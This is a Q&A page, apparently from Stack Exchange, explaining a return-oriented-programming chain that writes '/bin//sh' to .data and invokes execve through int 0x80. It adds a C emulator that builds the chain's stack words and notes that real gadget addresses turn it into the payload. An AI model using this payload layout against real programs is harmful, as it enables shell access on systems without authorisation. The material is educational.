Automatic exploitation via return oriented programming
Question
I need help understanding what is going on in this image:
What I fail to see is what the @ .data instructions accomplish in combination with the mov dword ptr [edx], eax, especially considering that edx is popped right after.
Answer
In short, the @ .data lines refer to writable memory that is used to write the "/bin//sh" string, which is later executed. The .data section is just a readable/writable section of the executable that is loaded into memory, typically used to store global variables.
Here's a breakdown of how the ROP chain works:
pop edx ; ret
@ .data
These two gadgets pop the address of the .data section into edx.
pop eax ; ret
'/bin'
These gadgets pop 0x6e69622f, or the first four characters of the /bin//sh string, into eax.
mov dword ptr [edx], eax ; ret
Then this writes the contents of eax at the address in edx; at this point the first four characters of the string have been written at the beginning of the .data section.
pop edx ; ret
@ .data + 4
pop eax ; ret
'//sh'
mov dword ptr [edx], eax ; ret
This part does the exact same thing to write the next four bytes of the string.
pop edx ; ret
@ .data + 8
xor eax, eax ; ret
mov dword ptr [edx], eax ; ret
And then this writes four null bytes after the string to null-terminate it.
pop ebx ; ret
@ .data
This loads ebx.
pop ecx ; pop ebx ; ret
@ .data + 8
padding without overwrite ebx
This writes .data+8 to ecx and writes .data to ebx. (Notice that the third line here is 0x080f4060, which we can see is the same address as .data three lines above.)
pop edx ; ret
@ .data + 8
This writes .data+8 to edx.
xor eax, eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
This writes 11 to eax.
int 0x80
This executes a system call on Linux. Here is a great resource for understanding system calls. We see that when eax is 11 (0xb), it is a call to execve, which is defined as follows:
int execve(const char *filename, char *const argv[], char *const envp[]);
So then ebx is filename, ecx is argv, and edx is envp. At this point, ebx points to the string /bin//sh, and both ecx and edx are .data+8. They are both treated as strings, but since .data+8 contains the null byte, ecx and edx are the empty string. So the call is essentially execve("/bin//sh", "", "");
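The chain above can be checked mechanically rather than by reading it: the following C program is an added example (not code from the question, the answer, or ROPgadget) that lays the chain out as the 32-bit words that would sit on the stack and steps through it with a tiny gadget emulator. The gadget addresses are placeholders chosen for the emulator; the only real address is the .data address 0x080f4060 quoted in the answer. After the run it decodes the register state the way the kernel would on int 0x80 (eax=11 selects execve, with ebx/ecx/edx as its three arguments) and confirms that .data holds "/bin//sh" followed by a zero dword, so argv and envp both point at a NULL first pointer.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Gadget addresses are placeholders chosen for this emulator (not taken from
 * the page); DATA_ADDR is the .data address the answer quotes, 0x080f4060. */
enum gadget {
    G_POP_EDX     = 0x08049001, /* pop edx ; ret */
    G_POP_EAX     = 0x08049002, /* pop eax ; ret */
    G_MOV_EDX_EAX = 0x08049003, /* mov dword ptr [edx], eax ; ret */
    G_XOR_EAX     = 0x08049004, /* xor eax, eax ; ret */
    G_POP_EBX     = 0x08049005, /* pop ebx ; ret */
    G_POP_ECX_EBX = 0x08049006, /* pop ecx ; pop ebx ; ret */
    G_INC_EAX     = 0x08049007, /* inc eax ; ret */
    G_INT80       = 0x08049008  /* int 0x80 */
};
#define DATA_ADDR  0x080f4060u
#define DATA_SIZE  16u
#define SYS_EXECVE 11

typedef struct {
    uint32_t eax, ebx, ecx, edx;
    uint8_t  data[DATA_SIZE];   /* emulated .data section */
    int      syscall_nr;        /* set when the chain reaches int 0x80 */
} cpu_t;

/* Pack four ASCII bytes into the little-endian dword that "pop eax" loads. */
static uint32_t le32(const char *s) {
    return (uint32_t)(uint8_t)s[0] | (uint32_t)(uint8_t)s[1] << 8 |
           (uint32_t)(uint8_t)s[2] << 16 | (uint32_t)(uint8_t)s[3] << 24;
}

/* Lay out the chain from the answer as the 32-bit words that sit on the stack. */
static size_t build_chain(uint32_t *c) {
    size_t n = 0;
    c[n++] = G_POP_EDX;     c[n++] = DATA_ADDR;        /* edx = .data */
    c[n++] = G_POP_EAX;     c[n++] = le32("/bin");     /* eax = "/bin" */
    c[n++] = G_MOV_EDX_EAX;                            /* [.data] = "/bin" */
    c[n++] = G_POP_EDX;     c[n++] = DATA_ADDR + 4;
    c[n++] = G_POP_EAX;     c[n++] = le32("//sh");
    c[n++] = G_MOV_EDX_EAX;                            /* [.data+4] = "//sh" */
    c[n++] = G_POP_EDX;     c[n++] = DATA_ADDR + 8;
    c[n++] = G_XOR_EAX;
    c[n++] = G_MOV_EDX_EAX;                            /* [.data+8] = 0, the terminator */
    c[n++] = G_POP_EBX;     c[n++] = DATA_ADDR;        /* ebx = filename */
    c[n++] = G_POP_ECX_EBX; c[n++] = DATA_ADDR + 8;    /* ecx = argv */
                            c[n++] = DATA_ADDR;        /* "padding without overwrite ebx" */
    c[n++] = G_POP_EDX;     c[n++] = DATA_ADDR + 8;    /* edx = envp */
    c[n++] = G_XOR_EAX;
    for (int i = 0; i < SYS_EXECVE; i++) c[n++] = G_INC_EAX;  /* eax = 11 */
    c[n++] = G_INT80;
    return n;
}

/* Execute the chain: every "ret" pops the next word as the gadget address, and each
 * pop inside a gadget consumes the word after it. Returns 0 when int 0x80 is reached. */
static int run_chain(cpu_t *cpu, const uint32_t *c, size_t n) {
    size_t sp = 0;
    memset(cpu, 0, sizeof *cpu);
    cpu->syscall_nr = -1;
    while (sp < n) {
        switch (c[sp++]) {
        case G_POP_EDX:     cpu->edx = c[sp++]; break;
        case G_POP_EAX:     cpu->eax = c[sp++]; break;
        case G_POP_EBX:     cpu->ebx = c[sp++]; break;
        case G_POP_ECX_EBX: cpu->ecx = c[sp++]; cpu->ebx = c[sp++]; break;
        case G_XOR_EAX:     cpu->eax = 0; break;
        case G_INC_EAX:     cpu->eax++; break;
        case G_MOV_EDX_EAX: {
            uint32_t off = cpu->edx - DATA_ADDR;
            if (off > DATA_SIZE - 4) return -1;       /* store outside emulated .data */
            for (int i = 0; i < 4; i++)               /* x86 stores little-endian */
                cpu->data[off + i] = (uint8_t)(cpu->eax >> (8 * i));
            break;
        }
        case G_INT80:       cpu->syscall_nr = (int)cpu->eax; return 0;
        default:            return -1;                /* not a gadget we know */
        }
    }
    return -1;                                        /* ran off the end, no syscall */
}

/* Decode the final state as the kernel would: eax=11 means execve(ebx, ecx, edx).
 * Returns 1 if the chain yields execve("/bin//sh", argv, envp) with argv[0] and
 * envp[0] both NULL (the zero dword at .data+8). */
static int chain_is_execve_binsh(void) {
    uint32_t chain[64];
    cpu_t cpu;
    if (run_chain(&cpu, chain, build_chain(chain)) != 0) return 0;
    if (cpu.syscall_nr != SYS_EXECVE) return 0;
    const char *filename = (const char *)cpu.data + (cpu.ebx - DATA_ADDR);
    uint32_t argv0 = le32((const char *)cpu.data + (cpu.ecx - DATA_ADDR));
    uint32_t envp0 = le32((const char *)cpu.data + (cpu.edx - DATA_ADDR));
    return strcmp(filename, "/bin//sh") == 0 && argv0 == 0 && envp0 == 0;
}

int main(void) {
    uint32_t chain[64];
    cpu_t cpu;
    size_t n = build_chain(chain);
    printf("chain: %zu words (%zu bytes)\n", n, n * 4);
    if (run_chain(&cpu, chain, n) == 0)
        printf("int 0x80 with eax=%u ebx=0x%08x ecx=0x%08x edx=0x%08x [.data]=\"%s\"\n",
               cpu.eax, cpu.ebx, cpu.ecx, cpu.edx, (const char *)cpu.data);
    printf("execve(\"/bin//sh\") chain: %s\n", chain_is_execve_binsh() ? "yes" : "no");
    return 0;
}
```

The emulator is deliberately strict: a store that lands outside the emulated .data window or a word that is not a known gadget aborts the run, which is the same failure you would see in a real process as a segfault or a jump into garbage. Swapping the placeholder gadget constants for the addresses ROPgadget prints for a given binary turns build_chain into the payload layout itself; the 34 words (136 bytes) it produces are what would be written after the saved return address.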